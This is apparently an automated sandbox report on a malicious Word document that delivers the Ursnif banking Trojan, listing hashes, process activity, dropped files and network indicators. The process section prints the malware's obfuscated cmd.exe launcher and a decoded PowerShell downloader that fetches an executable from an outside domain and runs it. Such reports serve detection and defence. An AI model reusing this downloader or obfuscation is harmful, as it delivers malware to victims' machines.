analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

d766e9abc56d57ec76c23f551b42d354347fa779a171bb1699e5ddab0fad44b7.doc

Full analysis: https://app.any.run/tasks/0d08efa8-7e15-4f0f-8411-5fc44ca2ef57
Verdict: Malicious activity
Threats:

Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world.

Analysis date: December 14, 2018, 13:45:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
gozi
ursnif
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 09:03:00 2018, Last Saved Time/Date: Fri Dec 14 09:03:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 40, Security: 0
MD5:

66C34F3D4A7AD88D23ABBF14A8A04E59

SHA1:

62E92CD7E3447F75E83F45416571CB25A2519529

SHA256:

D766E9ABC56D57EC76C23F551B42D354347FA779A171BB1699E5DDAB0FAD44B7

SSDEEP:

1536:Dtocn1kp59gxBK85fBdmtjQrUg1lFEe+a9:D641k/W48HmtEYg1ly

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2832)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2832)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2588)
    • URSNIF was detected

      • powershell.exe (PID: 2284)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4092)
    • Creates files in the user directory

      • powershell.exe (PID: 2284)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2832)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2832)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 46
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 40
Words: 7
Pages: 1
ModifyDate: 2018:12:14 09:03:00
CreateDate: 2018:12:14 09:03:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs #URSNIF powershell.exe taskmgr.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2832"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\d766e9abc56d57ec76c23f551b42d354347fa779a171bb1699e5ddab0fad44b7.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4092c:\oZzsJWRbs\IUdaVvlQoCSFQH\GIjUYAfoFd\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set iRrc=jPVrnEdazsdkkJXOWCPMowLqYzQUiBZ;)+G/=2x,Ap h9cbe80uR-?KFyI{\l:t$(S@vNfTmg1D'.}&&for %1 in (63,27,57,12,36,75,14,60,40,75,31,63,15,71,34,36,4,47,21,52,20,46,0,47,45,62,42,68,47,62,76,16,47,46,17,60,28,47,4,62,31,63,2,5,46,36,75,43,62,62,41,61,35,35,56,50,60,7,21,4,47,9,9,47,76,45,20,71,35,62,56,45,60,7,71,35,69,3,47,9,9,3,76,41,43,41,53,60,36,21,56,72,38,73,37,76,62,12,4,75,76,65,41,60,28,62,64,75,66,75,32,31,63,26,71,16,36,75,51,21,0,75,31,63,22,17,54,42,36,42,75,48,44,73,75,31,63,28,25,7,36,75,16,51,50,75,31,63,51,20,16,36,63,47,4,67,61,62,47,71,41,33,75,59,75,33,63,22,17,54,33,75,76,47,38,47,75,31,69,20,3,47,7,45,43,64,63,25,4,28,42,28,4,42,63,2,5,46,32,58,62,3,56,58,63,15,71,34,76,74,20,21,4,60,20,7,10,55,28,60,47,64,63,25,4,28,39,42,63,51,20,16,32,31,63,30,68,71,36,75,28,23,30,75,31,57,69,42,64,64,34,47,62,52,57,62,47,71,42,63,51,20,16,32,76,60,47,4,72,62,43,42,52,72,47,42,48,49,49,49,49,32,42,58,57,4,67,20,12,47,52,57,62,47,71,42,63,51,20,16,31,63,23,40,34,36,75,62,50,0,75,31,46,3,47,7,12,31,77,77,45,7,62,45,43,58,77,77,63,70,28,19,36,75,43,45,2,75,31,83)do set zgLp=!zgLp!!iRrc:~%1,1!&&if %1 gtr 82 powershell.exe "!zgLp:~-339!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2588CmD /V:ON/C"set iRrc=jPVrnEdazsdkkJXOWCPMowLqYzQUiBZ;)+G/=2x,Ap h9cbe80uR-?KFyI{\l:t$(S@vNfTmg1D'.}&&for %1 in (63,27,57,12,36,75,14,60,40,75,31,63,15,71,34,36,4,47,21,52,20,46,0,47,45,62,42,68,47,62,76,16,47,46,17,60,28,47,4,62,31,63,2,5,46,36,75,43,62,62,41,61,35,35,56,50,60,7,21,4,47,9,9,47,76,45,20,71,35,62,56,45,60,7,71,35,69,3,47,9,9,3,76,41,43,41,53,60,36,21,56,72,38,73,37,76,62,12,4,75,76,65,41,60,28,62,64,75,66,75,32,31,63,26,71,16,36,75,51,21,0,75,31,63,22,17,54,42,36,42,75,48,44,73,75,31,63,28,25,7,36,75,16,51,50,75,31,63,51,20,16,36,63,47,4,67,61,62,47,71,41,33,75,59,75,33,63,22,17,54,33,75,76,47,38,47,75,31,69,20,3,47,7,45,43,64,63,25,4,28,42,28,4,42,63,2,5,46,32,58,62,3,56,58,63,15,71,34,76,74,20,21,4,60,20,7,10,55,28,60,47,64,63,25,4,28,39,42,63,51,20,16,32,31,63,30,68,71,36,75,28,23,30,75,31,57,69,42,64,64,34,47,62,52,57,62,47,71,42,63,51,20,16,32,76,60,47,4,72,62,43,42,52,72,47,42,48,49,49,49,49,32,42,58,57,4,67,20,12,47,52,57,62,47,71,42,63,51,20,16,31,63,23,40,34,36,75,62,50,0,75,31,46,3,47,7,12,31,77,77,45,7,62,45,43,58,77,77,63,70,28,19,36,75,43,45,2,75,31,83)do set zgLp=!zgLp!!iRrc:~%1,1!&&if %1 gtr 82 powershell.exe "!zgLp:~-339!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2284powershell.exe "$UIk='XlA';$OmG=new-object Net.WebClient;$VEb='http://yulawnesse.com/tyclam/fressr.php?l=wygx12.tkn'.Split('@');$QmW='Rwj';$LCK = '891';$iza='WRu';$RoW=$env:temp+'\'+$LCK+'.exe';foreach($zni in $VEb){try{$OmG.DownloadFile($zni, $RoW);$ZNm='iqZ';If ((Get-Item $RoW).length -ge 80000) {Invoke-Item $RoW;$qAG='tuj';break;}}catch{}}$TiM='hcV';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2920"C:\Windows\system32\taskmgr.exe" /4C:\Windows\system32\taskmgr.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Task Manager
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 428
Read events
965
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR99B6.tmp.cvr
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A83A1E51.wmf
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA148587.wmf
MD5:
SHA256:
2284powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BWUX5RTX4U7H98UYH17Y.temp
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:41379A924454D4DBF21EC8153C20C10F
SHA256:0C15CF2B44D7D8698623838B4214E135CD0F5B33F8FE0D860DBE04AB98A65B80
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:0470555F5B60FC68D28CD54C221815F7
SHA256:F222BE75B42458B5C4830DCED4CBA1F43762E0ADF57D788AC45D0B913E6A357D
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5524D390.wmfwmf
MD5:40B1BF403CABEBD566194CB529360ECA
SHA256:BCE2EA42889A7C18EFFBB88B181D16BD0E6AC2E5FDAA78DCC5CD553760195B41
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8F0D01E.wmfwmf
MD5:5B237CFAF5075C06C67E56C8D0839FBE
SHA256:268134DFB4DEC5C0E159ACDED18DBC76BAA8D9CF17F6DA46D3A7ACB3ADE4F13F
2284powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19aa7e.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2284powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2284
powershell.exe
GET
404
94.177.229.49:80
http://yulawnesse.com/tyclam/fressr.php?l=wygx12.tkn
DE
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2284
powershell.exe
94.177.229.49:80
yulawnesse.com
Aruba SAS
DE
suspicious

DNS requests

Domain
IP
Reputation
yulawnesse.com
  • 94.177.229.49
malicious

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info